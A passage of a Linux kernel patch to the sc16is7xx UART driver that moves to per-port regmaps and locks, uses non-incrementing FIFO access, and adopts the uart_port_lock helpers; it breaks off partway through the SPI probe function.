+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	unsigned int val = 0;
+-	const u8 line = sc16is7xx_line(port);
+ 
+-	regmap_read(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line, &val);
++	regmap_read(one->regmap, reg, &val);
+ 
+ 	return val;
+ }
+ 
+ static void sc16is7xx_port_write(struct uart_port *port, u8 reg, u8 val)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	regmap_write(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line, val);
++	regmap_write(one->regmap, reg, val);
+ }
+ 
+ static void sc16is7xx_fifo_read(struct uart_port *port, unsigned int rxlen)
+ {
+ 	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-	u8 addr = (SC16IS7XX_RHR_REG << SC16IS7XX_REG_SHIFT) | line;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	regcache_cache_bypass(s->regmap, true);
+-	regmap_raw_read(s->regmap, addr, s->buf, rxlen);
+-	regcache_cache_bypass(s->regmap, false);
++	regmap_noinc_read(one->regmap, SC16IS7XX_RHR_REG, s->buf, rxlen);
+ }
+ 
+ static void sc16is7xx_fifo_write(struct uart_port *port, u8 to_send)
+ {
+ 	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-	u8 addr = (SC16IS7XX_THR_REG << SC16IS7XX_REG_SHIFT) | line;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+ 	/*
+ 	 * Don't send zero-length data, at least on SPI it confuses the chip
+@@ -412,32 +398,15 @@ static void sc16is7xx_fifo_write(struct uart_port *port, u8 to_send)
+ 	if (unlikely(!to_send))
+ 		return;
+ 
+-	regcache_cache_bypass(s->regmap, true);
+-	regmap_raw_write(s->regmap, addr, s->buf, to_send);
+-	regcache_cache_bypass(s->regmap, false);
++	regmap_noinc_write(one->regmap, SC16IS7XX_THR_REG, s->buf, to_send);
+ }
+ 
+ static void sc16is7xx_port_update(struct uart_port *port, u8 reg,
+ 				  u8 mask, u8 val)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-
+-	regmap_update_bits(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line,
+-			   mask, val);
+-}
+-
+-static int sc16is7xx_alloc_line(void)
+-{
+-	int i;
+-
+-	BUILD_BUG_ON(SC16IS7XX_MAX_DEVS > BITS_PER_LONG);
+-
+-	for (i = 0; i < SC16IS7XX_MAX_DEVS; i++)
+-		if (!test_and_set_bit(i, &sc16is7xx_lines))
+-			break;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	return i;
++	regmap_update_bits(one->regmap, reg, mask, val);
+ }
+ 
+ static void sc16is7xx_power(struct uart_port *port, int on)
+@@ -479,7 +448,7 @@ static const struct sc16is7xx_devtype sc16is762_devtype = {
+ 
+ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ {
+-	switch (reg >> SC16IS7XX_REG_SHIFT) {
++	switch (reg) {
+ 	case SC16IS7XX_RHR_REG:
+ 	case SC16IS7XX_IIR_REG:
+ 	case SC16IS7XX_LSR_REG:
+@@ -498,7 +467,7 @@ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ 
+ static bool sc16is7xx_regmap_precious(struct device *dev, unsigned int reg)
+ {
+-	switch (reg >> SC16IS7XX_REG_SHIFT) {
++	switch (reg) {
+ 	case SC16IS7XX_RHR_REG:
+ 		return true;
+ 	default:
+@@ -508,9 +477,14 @@ static bool sc16is7xx_regmap_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool sc16is7xx_regmap_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == SC16IS7XX_RHR_REG;
++}
++
+ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	u8 lcr;
+ 	u8 prescaler = 0;
+ 	unsigned long clk = port->uartclk, div = clk / 16 / baud;
+@@ -533,7 +507,7 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 	 * because the bulk of the interrupt processing is run as a workqueue
+ 	 * job in thread context.
+ 	 */
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 
+ 	lcr = sc16is7xx_port_read(port, SC16IS7XX_LCR_REG);
+ 
+@@ -542,17 +516,17 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+ 	/* Enable enhanced features */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFR_REG,
+ 			      SC16IS7XX_EFR_ENABLE_BIT,
+ 			      SC16IS7XX_EFR_ENABLE_BIT);
+ 
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	mutex_unlock(&s->efr_lock);
++	mutex_unlock(&one->efr_lock);
+ 
+ 	sc16is7xx_port_update(port, SC16IS7XX_MCR_REG,
+ 			      SC16IS7XX_MCR_CLKSEL_BIT,
+@@ -563,10 +537,10 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 			     SC16IS7XX_LCR_CONF_MODE_A);
+ 
+ 	/* Write the new divisor */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_write(port, SC16IS7XX_DLH_REG, div / 256);
+ 	sc16is7xx_port_write(port, SC16IS7XX_DLL_REG, div % 256);
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+@@ -667,9 +641,9 @@ static void sc16is7xx_handle_tx(struct uart_port *port)
+ 	}
+ 
+ 	if (uart_circ_empty(xmit) || uart_tx_stopped(port)) {
+-		spin_lock_irqsave(&port->lock, flags);
++		uart_port_lock_irqsave(port, &flags);
+ 		sc16is7xx_stop_tx(port);
+-		spin_unlock_irqrestore(&port->lock, flags);
++		uart_port_unlock_irqrestore(port, flags);
+ 		return;
+ 	}
+ 
+@@ -698,13 +672,15 @@ static void sc16is7xx_handle_tx(struct uart_port *port)
+ 		sc16is7xx_fifo_write(port, to_send);
+ 	}
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	if (uart_circ_chars_pending(xmit) < WAKEUP_CHARS)
+ 		uart_write_wakeup(port);
+ 
+ 	if (uart_circ_empty(xmit))
+ 		sc16is7xx_stop_tx(port);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	else
++		sc16is7xx_ier_set(port, SC16IS7XX_IER_THRI_BIT);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static unsigned int sc16is7xx_get_hwmctrl(struct uart_port *port)
+@@ -722,11 +698,10 @@ static unsigned int sc16is7xx_get_hwmctrl(struct uart_port *port)
+ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ {
+ 	struct uart_port *port = &one->port;
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	unsigned long flags;
+ 	unsigned int status, changed;
+ 
+-	lockdep_assert_held_once(&s->efr_lock);
++	lockdep_assert_held_once(&one->efr_lock);
+ 
+ 	status = sc16is7xx_get_hwmctrl(port);
+ 	changed = status ^ one->old_mctrl;
+@@ -736,7 +711,7 @@ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ 
+ 	one->old_mctrl = status;
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	if ((changed & TIOCM_RNG) && (status & TIOCM_RNG))
+ 		port->icount.rng++;
+ 	if (changed & TIOCM_DSR)
+@@ -747,79 +722,82 @@ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ 		uart_handle_cts_change(port, status & TIOCM_CTS);
+ 
+ 	wake_up_interruptible(&port->state->port.delta_msr_wait);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static bool sc16is7xx_port_irq(struct sc16is7xx_port *s, int portno)
+ {
++	bool rc = true;
++	unsigned int iir, rxlen;
+ 	struct uart_port *port = &s->p[portno].port;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	do {
+-		unsigned int iir, rxlen;
+-		struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-
+-		iir = sc16is7xx_port_read(port, SC16IS7XX_IIR_REG);
+-		if (iir & SC16IS7XX_IIR_NO_INT_BIT)
+-			return false;
+-
+-		iir &= SC16IS7XX_IIR_ID_MASK;
+-
+-		switch (iir) {
+-		case SC16IS7XX_IIR_RDI_SRC:
+-		case SC16IS7XX_IIR_RLSE_SRC:
+-		case SC16IS7XX_IIR_RTOI_SRC:
+-		case SC16IS7XX_IIR_XOFFI_SRC:
+-			rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
+-
+-			/*
+-			 * There is a silicon bug that makes the chip report a
+-			 * time-out interrupt but no data in the FIFO. This is
+-			 * described in errata section 18.1.4.
+-			 *
+-			 * When this happens, read one byte from the FIFO to
+-			 * clear the interrupt.
+-			 */
+-			if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
+-				rxlen = 1;
+-
+-			if (rxlen)
+-				sc16is7xx_handle_rx(port, rxlen, iir);
+-			break;
++	mutex_lock(&one->efr_lock);
++
++	iir = sc16is7xx_port_read(port, SC16IS7XX_IIR_REG);
++	if (iir & SC16IS7XX_IIR_NO_INT_BIT) {
++		rc = false;
++		goto out_port_irq;
++	}
++
++	iir &= SC16IS7XX_IIR_ID_MASK;
++
++	switch (iir) {
++	case SC16IS7XX_IIR_RDI_SRC:
++	case SC16IS7XX_IIR_RLSE_SRC:
++	case SC16IS7XX_IIR_RTOI_SRC:
++	case SC16IS7XX_IIR_XOFFI_SRC:
++		rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
++
++		/*
++		 * There is a silicon bug that makes the chip report a
++		 * time-out interrupt but no data in the FIFO. This is
++		 * described in errata section 18.1.4.
++		 *
++		 * When this happens, read one byte from the FIFO to
++		 * clear the interrupt.
++		 */
++		if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
++			rxlen = 1;
++
++		if (rxlen)
++			sc16is7xx_handle_rx(port, rxlen, iir);
++		break;
+ 		/* CTSRTS interrupt comes only when CTS goes inactive */
+-		case SC16IS7XX_IIR_CTSRTS_SRC:
+-		case SC16IS7XX_IIR_MSI_SRC:
+-			sc16is7xx_update_mlines(one);
+-			break;
+-		case SC16IS7XX_IIR_THRI_SRC:
+-			sc16is7xx_handle_tx(port);
+-			break;
+-		default:
+-			dev_err_ratelimited(port->dev,
+-					    "ttySC%i: Unexpected interrupt: %x",
+-					    port->line, iir);
+-			break;
+-		}
+-	} while (0);
+-	return true;
++	case SC16IS7XX_IIR_CTSRTS_SRC:
++	case SC16IS7XX_IIR_MSI_SRC:
++		sc16is7xx_update_mlines(one);
++		break;
++	case SC16IS7XX_IIR_THRI_SRC:
++		sc16is7xx_handle_tx(port);
++		break;
++	default:
++		dev_err_ratelimited(port->dev,
++				    "ttySC%i: Unexpected interrupt: %x",
++				    port->line, iir);
++		break;
++	}
++
++out_port_irq:
++	mutex_unlock(&one->efr_lock);
++
++	return rc;
+ }
+ 
+ static irqreturn_t sc16is7xx_irq(int irq, void *dev_id)
+ {
+-	struct sc16is7xx_port *s = (struct sc16is7xx_port *)dev_id;
++	bool keep_polling;
+ 
+-	mutex_lock(&s->efr_lock);
++	struct sc16is7xx_port *s = (struct sc16is7xx_port *)dev_id;
+ 
+-	while (1) {
+-		bool keep_polling = false;
++	do {
+ 		int i;
+ 
++		keep_polling = false;
++
+ 		for (i = 0; i < s->devtype->nr_uart; ++i)
+ 			keep_polling |= sc16is7xx_port_irq(s, i);
+-		if (!keep_polling)
+-			break;
+-	}
+-
+-	mutex_unlock(&s->efr_lock);
++	} while (keep_polling);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -827,20 +805,15 @@ static irqreturn_t sc16is7xx_irq(int irq, void *dev_id)
+ static void sc16is7xx_tx_proc(struct kthread_work *ws)
+ {
+ 	struct uart_port *port = &(to_sc16is7xx_one(ws, tx_work)->port);
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	unsigned long flags;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+ 	if ((port->rs485.flags & SER_RS485_ENABLED) &&
+ 	    (port->rs485.delay_rts_before_send > 0))
+ 		msleep(port->rs485.delay_rts_before_send);
+ 
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 	sc16is7xx_handle_tx(port);
+-	mutex_unlock(&s->efr_lock);
+-
+-	spin_lock_irqsave(&port->lock, flags);
+-	sc16is7xx_ier_set(port, SC16IS7XX_IER_THRI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	mutex_unlock(&one->efr_lock);
+ }
+ 
+ static void sc16is7xx_reconf_rs485(struct uart_port *port)
+@@ -851,14 +824,14 @@ static void sc16is7xx_reconf_rs485(struct uart_port *port)
+ 	struct serial_rs485 *rs485 = &port->rs485;
+ 	unsigned long irqflags;
+ 
+-	spin_lock_irqsave(&port->lock, irqflags);
++	uart_port_lock_irqsave(port, &irqflags);
+ 	if (rs485->flags & SER_RS485_ENABLED) {
+ 		efcr |=	SC16IS7XX_EFCR_AUTO_RS485_BIT;
+ 
+ 		if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			efcr |= SC16IS7XX_EFCR_RTS_INVERT_BIT;
+ 	}
+-	spin_unlock_irqrestore(&port->lock, irqflags);
++	uart_port_unlock_irqrestore(port, irqflags);
+ 
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFCR_REG, mask, efcr);
+ }
+@@ -869,10 +842,10 @@ static void sc16is7xx_reg_proc(struct kthread_work *ws)
+ 	struct sc16is7xx_one_config config;
+ 	unsigned long irqflags;
+ 
+-	spin_lock_irqsave(&one->port.lock, irqflags);
++	uart_port_lock_irqsave(&one->port, &irqflags);
+ 	config = one->config;
+ 	memset(&one->config, 0, sizeof(one->config));
+-	spin_unlock_irqrestore(&one->port.lock, irqflags);
++	uart_port_unlock_irqrestore(&one->port, irqflags);
+ 
+ 	if (config.flags & SC16IS7XX_RECONF_MD) {
+ 		u8 mcr = 0;
+@@ -943,9 +916,9 @@ static void sc16is7xx_ms_proc(struct kthread_work *ws)
+ 	struct sc16is7xx_port *s = dev_get_drvdata(one->port.dev);
+ 
+ 	if (one->port.state) {
+-		mutex_lock(&s->efr_lock);
++		mutex_lock(&one->efr_lock);
+ 		sc16is7xx_update_mlines(one);
+-		mutex_unlock(&s->efr_lock);
++		mutex_unlock(&one->efr_lock);
+ 
+ 		kthread_queue_delayed_work(&s->kworker, &one->ms_work, HZ);
+ 	}
+@@ -978,18 +951,18 @@ static void sc16is7xx_throttle(struct uart_port *port)
+ 	 * value set in MCR register. Stop reading data from RX FIFO so the
+ 	 * AutoRTS feature will de-activate RTS output.
+ 	 */
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_ier_clear(port, SC16IS7XX_IER_RDI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static void sc16is7xx_unthrottle(struct uart_port *port)
+ {
+ 	unsigned long flags;
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_ier_set(port, SC16IS7XX_IER_RDI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static unsigned int sc16is7xx_tx_empty(struct uart_port *port)
+@@ -1029,7 +1002,6 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 				  struct ktermios *termios,
+ 				  const struct ktermios *old)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	unsigned int lcr, flow = 0;
+ 	int baud;
+@@ -1088,13 +1060,13 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 		port->ignore_status_mask |= SC16IS7XX_LSR_BRK_ERROR_MASK;
+ 
+ 	/* As above, claim the mutex while accessing the EFR. */
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+ 	/* Configure flow control */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_write(port, SC16IS7XX_XON1_REG, termios->c_cc[VSTART]);
+ 	sc16is7xx_port_write(port, SC16IS7XX_XOFF1_REG, termios->c_cc[VSTOP]);
+ 
+@@ -1113,12 +1085,12 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 			      SC16IS7XX_EFR_REG,
+ 			      SC16IS7XX_EFR_FLOWCTRL_BITS,
+ 			      flow);
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Update LCR register */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	mutex_unlock(&s->efr_lock);
++	mutex_unlock(&one->efr_lock);
+ 
+ 	/* Get baud rate generator configuration */
+ 	baud = uart_get_baud_rate(port, termios, old,
+@@ -1128,7 +1100,7 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 	/* Setup baudrate generator */
+ 	baud = sc16is7xx_set_baud(port, baud);
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 
+ 	/* Update timeout according to new baud rate */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+@@ -1136,7 +1108,7 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 	if (UART_ENABLE_MS(port, termios->c_cflag))
+ 		sc16is7xx_enable_ms(port);
+ 
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static int sc16is7xx_config_rs485(struct uart_port *port, struct ktermios *termios,
+@@ -1164,7 +1136,6 @@ static int sc16is7xx_config_rs485(struct uart_port *port, struct ktermios *termi
+ static int sc16is7xx_startup(struct uart_port *port)
+ {
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	unsigned int val;
+ 	unsigned long flags;
+ 
+@@ -1181,7 +1152,7 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 
+ 	/* Enable write access to enhanced features and internal clock div */
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFR_REG,
+@@ -1199,7 +1170,7 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 			     SC16IS7XX_TCR_RX_RESUME(24) |
+ 			     SC16IS7XX_TCR_RX_HALT(48));
+ 
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Now, initialize the UART */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, SC16IS7XX_LCR_WORD_LEN_8);
+@@ -1223,9 +1194,9 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 	sc16is7xx_port_write(port, SC16IS7XX_IER_REG, val);
+ 
+ 	/* Enable modem status polling */
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_enable_ms(port);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ 
+ 	return 0;
+ }
+@@ -1427,7 +1398,8 @@ static int sc16is7xx_setup_gpio_chip(struct sc16is7xx_port *s)
+ /*
+  * Configure ports designated to operate as modem control lines.
+  */
+-static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
++static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s,
++				       struct regmap *regmap)
+ {
+ 	int i;
+ 	int ret;
+@@ -1456,8 +1428,8 @@ static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
+ 
+ 	if (s->mctrl_mask)
+ 		regmap_update_bits(
+-			s->regmap,
+-			SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
++			regmap,
++			SC16IS7XX_IOCONTROL_REG,
+ 			SC16IS7XX_IOCONTROL_MODEM_A_BIT |
+ 			SC16IS7XX_IOCONTROL_MODEM_B_BIT, s->mctrl_mask);
+ 
+@@ -1472,7 +1444,7 @@ static const struct serial_rs485 sc16is7xx_rs485_supported = {
+ 
+ static int sc16is7xx_probe(struct device *dev,
+ 			   const struct sc16is7xx_devtype *devtype,
+-			   struct regmap *regmap, int irq)
++			   struct regmap *regmaps[], int irq)
+ {
+ 	unsigned long freq = 0, *pfreq = dev_get_platdata(dev);
+ 	unsigned int val;
+@@ -1480,16 +1452,20 @@ static int sc16is7xx_probe(struct device *dev,
+ 	int i, ret;
+ 	struct sc16is7xx_port *s;
+ 
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	for (i = 0; i < devtype->nr_uart; i++)
++		if (IS_ERR(regmaps[i]))
++			return PTR_ERR(regmaps[i]);
+ 
+ 	/*
+ 	 * This device does not have an identification register that would
+ 	 * tell us if we are really connected to the correct device.
+ 	 * The best we can do is to check if communication is at all possible.
++	 *
++	 * Note: regmap[0] is used in the probe function to access registers
++	 * common to all channels/ports, as it is guaranteed to be present on
++	 * all variants.
+ 	 */
+-	ret = regmap_read(regmap,
+-			  SC16IS7XX_LSR_REG << SC16IS7XX_REG_SHIFT, &val);
++	ret = regmap_read(regmaps[0], SC16IS7XX_LSR_REG, &val);
+ 	if (ret < 0)
+ 		return -EPROBE_DEFER;
+ 
+@@ -1523,10 +1499,8 @@ static int sc16is7xx_probe(struct device *dev,
+ 			return -EINVAL;
+ 	}
+ 
+-	s->regmap = regmap;
+ 	s->devtype = devtype;
+ 	dev_set_drvdata(dev, s);
+-	mutex_init(&s->efr_lock);
+ 
+ 	kthread_init_worker(&s->kworker);
+ 	s->kworker_task = kthread_run(kthread_worker_fn, &s->kworker,
+@@ -1538,11 +1512,17 @@ static int sc16is7xx_probe(struct device *dev,
+ 	sched_set_fifo(s->kworker_task);
+ 
+ 	/* reset device, purging any pending irq / data */
+-	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+-			SC16IS7XX_IOCONTROL_SRESET_BIT);
++	regmap_write(regmaps[0], SC16IS7XX_IOCONTROL_REG,
++		     SC16IS7XX_IOCONTROL_SRESET_BIT);
+ 
+ 	for (i = 0; i < devtype->nr_uart; ++i) {
+-		s->p[i].line		= i;
++		s->p[i].port.line = find_first_zero_bit(&sc16is7xx_lines,
++							SC16IS7XX_MAX_DEVS);
++		if (s->p[i].port.line >= SC16IS7XX_MAX_DEVS) {
++			ret = -ERANGE;
++			goto out_ports;
++		}
++
+ 		/* Initialize port data */
+ 		s->p[i].port.dev	= dev;
+ 		s->p[i].port.irq	= irq;
+@@ -1562,12 +1542,9 @@ static int sc16is7xx_probe(struct device *dev,
+ 		s->p[i].port.rs485_supported = sc16is7xx_rs485_supported;
+ 		s->p[i].port.ops	= &sc16is7xx_ops;
+ 		s->p[i].old_mctrl	= 0;
+-		s->p[i].port.line	= sc16is7xx_alloc_line();
++		s->p[i].regmap		= regmaps[i];
+ 
+-		if (s->p[i].port.line >= SC16IS7XX_MAX_DEVS) {
+-			ret = -ENOMEM;
+-			goto out_ports;
+-		}
++		mutex_init(&s->p[i].efr_lock);
+ 
+ 		ret = uart_get_rs485_mode(&s->p[i].port);
+ 		if (ret)
+@@ -1584,20 +1561,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 		kthread_init_work(&s->p[i].tx_work, sc16is7xx_tx_proc);
+ 		kthread_init_work(&s->p[i].reg_work, sc16is7xx_reg_proc);
+ 		kthread_init_delayed_work(&s->p[i].ms_work, sc16is7xx_ms_proc);
++
+ 		/* Register port */
+-		uart_add_one_port(&sc16is7xx_uart, &s->p[i].port);
++		ret = uart_add_one_port(&sc16is7xx_uart, &s->p[i].port);
++		if (ret)
++			goto out_ports;
++
++		set_bit(s->p[i].port.line, &sc16is7xx_lines);
+ 
+ 		/* Enable EFR */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_LCR_REG,
+ 				     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+-		regcache_cache_bypass(s->regmap, true);
++		regcache_cache_bypass(regmaps[i], true);
+ 
+ 		/* Enable write access to enhanced features */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_EFR_REG,
+ 				     SC16IS7XX_EFR_ENABLE_BIT);
+ 
+-		regcache_cache_bypass(s->regmap, false);
++		regcache_cache_bypass(regmaps[i], false);
+ 
+ 		/* Restore access to general registers */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_LCR_REG, 0x00);
+@@ -1617,7 +1599,7 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
+-	ret = sc16is7xx_setup_mctrl_ports(s);
++	ret = sc16is7xx_setup_mctrl_ports(s, regmaps[0]);
+ 	if (ret)
+ 		goto out_ports;
+ 
+@@ -1652,10 +1634,9 @@ static int sc16is7xx_probe(struct device *dev,
+ #endif
+ 
+ out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
++	for (i = 0; i < devtype->nr_uart; i++)
++		if (test_and_clear_bit(s->p[i].port.line, &sc16is7xx_lines))
++			uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+ 
+ 	kthread_stop(s->kworker_task);
+ 
+@@ -1677,8 +1658,8 @@ static void sc16is7xx_remove(struct device *dev)
+ 
+ 	for (i = 0; i < s->devtype->nr_uart; i++) {
+ 		kthread_cancel_delayed_work_sync(&s->p[i].ms_work);
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++		if (test_and_clear_bit(s->p[i].port.line, &sc16is7xx_lines))
++			uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+ 		sc16is7xx_power(&s->p[i].port, 0);
+ 	}
+ 
+@@ -1700,19 +1681,42 @@ static const struct of_device_id __maybe_unused sc16is7xx_dt_ids[] = {
+ MODULE_DEVICE_TABLE(of, sc16is7xx_dt_ids);
+ 
+ static struct regmap_config regcfg = {
+-	.reg_bits = 7,
+-	.pad_bits = 1,
++	.reg_bits = 5,
++	.pad_bits = 3,
+ 	.val_bits = 8,
+ 	.cache_type = REGCACHE_RBTREE,
+ 	.volatile_reg = sc16is7xx_regmap_volatile,
+ 	.precious_reg = sc16is7xx_regmap_precious,
++	.writeable_noinc_reg = sc16is7xx_regmap_noinc,
++	.readable_noinc_reg = sc16is7xx_regmap_noinc,
++	.max_raw_read = SC16IS7XX_FIFO_SIZE,
++	.max_raw_write = SC16IS7XX_FIFO_SIZE,
++	.max_register = SC16IS7XX_EFCR_REG,
+ };
+ 
++static const char *sc16is7xx_regmap_name(u8 port_id)
++{
++	switch (port_id) {
++	case 0:	return "port0";
++	case 1:	return "port1";
++	default:
++		WARN_ON(true);
++		return NULL;
++	}
++}
++
++static unsigned int sc16is7xx_regmap_port_mask(unsigned int port_id)
++{
++	/* CH1,CH0 are at bits 2:1. */
++	return port_id << 1;
++}
++
+ #ifdef CONFIG_SERIAL_SC16IS7XX_SPI
+ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ {
+ 	const struct sc16is7xx_devtype *devtype;
+-	struct regmap *regmap;
++	struct regmap *regmaps[2];
++	unsigned int i;
+ 	int ret;
+ 
+ 	/* Setup SPI bus */
+@@ -1737,11 +1741,20 @@ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ 		devtype = (struct sc16is7xx_devtype *)id_entry->driver_data;
+ 	}
+ 
+-	regcfg.max_register = (0xf << SC16IS7XX_REG_SHIFT) |
+-			      (devtype->nr_uart - 1);
+-	regmap = devm_regmap_init_spi(spi, &regcfg);
++	for (i = 0; i < devtype->nr_uart; i++) {
++		regcfg.name = sc16is7xx_regmap_name(i);
++		/*
++		 * If read_flag_mask is 0, the regmap code sets it to a default
++		 * of 0x80. Since we specify our own mask, we must add the READ
++		 * bit ourselves:
++		 */
++		regcfg.read_flag_mask = sc16is7xx_regmap_port_mask(i) |
++			SC16IS7XX_SPI_READ_BIT;
++		regcfg.write_flag_mask = sc16is7xx_regmap_port_mask(i);
